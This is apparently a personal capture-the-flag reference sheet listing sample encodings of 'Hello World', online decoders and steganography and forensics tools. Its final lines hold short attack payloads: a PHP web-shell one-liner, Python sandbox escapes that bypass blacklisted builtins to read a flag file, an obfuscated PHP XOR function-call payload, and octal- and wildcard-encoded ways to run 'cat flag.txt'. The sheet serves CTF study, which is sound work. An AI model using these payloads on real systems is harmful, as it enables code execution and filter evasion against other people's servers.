Reference for CTF Challenges.
Note : All the encoded/encrypted strings are 'Hello World".
List of Numeral Systems - https://en.wikipedia.org/wiki/List_of_numeral_systems
Base 26(Hexavigesimal) => 3752127 10786572 - https://www.dcode.fr/base-26-cipher
Base 32 => NBSWY3DPEB3W64TMMQ====== - https://www.dcode.fr/base-32-encoding
Base 58 => StV1DL6CwTryKyV - https://www.dcode.fr/base-58-cipher
Base 64 => aGVsbG8gd29ybGQ= - https://www.dcode.fr/base-64-encoding
Base 85(Ascii85) => BOu!rD]j7BEbo7 - https://www.dcode.fr/ascii-85-encoding
Base 91 => >OwJh>Io0Tv!lE - https://www.dcode.fr/base-91-encoding
Base65536 => 驈ꍬ啯𒁗ꍲᕤ - https://www.better-converter.com/Encoders-Decoders/Base65536-Decode
Twin Hex ==> 30l5os5uo44v64s51c - https://www.calcresult.com/misc/cyphers/twin-hex.html
Ascii to x86 Disassembly - https://gchq.github.io/CyberChef/#recipe=From_Decimal('Comma',false)To_Hex('Space',0)Disassemble_x86('64','Full%20x86%20architecture',16,0,true,true)
Zero-width space Decoder - https://offdev.net/demos/zwsp-steg-js.
Unicode Analyzer - https://www.fontspace.com/unicode/analyzer
Live Disassembler - https://godbolt.org/
Linux Command Explaination - https://explainshell.com
Fernet online decoder - https://asecuritysite.com/encryption/ferdecode
rawpixels.net - for raw pixels decoding
Online Stegnography Tool - https://stegonline.georgeom.net/upload
Dig Webinterface - https://www.digwebinterface.com
Gif splitter - https://ezgif.com/split
convert challange.gif -transparent white result.gif
Online Packet analyser - https://apackets.com
Dual Tone Multi Frequency - http://dialabc.com/sound/detect/index.html
Cipher Identifier - https://www.boxentriq.com/code-breaking/cipher-identifier
pngcheck -qv test.png - Use this command to check for broken png.
Png repair tool - https://github.com/sherlly/PCRT
Simple one liner - <?php system("whoami");?>
Python Sandbox escape - globals()["__builtins__"].open("/flag").read()
Escape while builtins and open is blacklisted - globals().__getitem__(bytes.fromhex(%275f5f6275696c74696e735f5f%27).decode(%27utf-8%27)).__getitem__(bytes.fromhex(%276f70656e%27).decode(%27utf-8%27))(%22/flag%22,%20%22r%22).read()
Hashes Ref : https://blog.csdn.net/u013512548/article/details/108213295
PHP calc :
('000000'^'8288~!'^'{{{|+|')('000000000000'^'~,81~!,,0838'^'-}|!(}}{.|{|')
\143\141\164\40\146\154\141\147\56\164\170\164
/???/??? ????.???
- /bin/cat flag.txt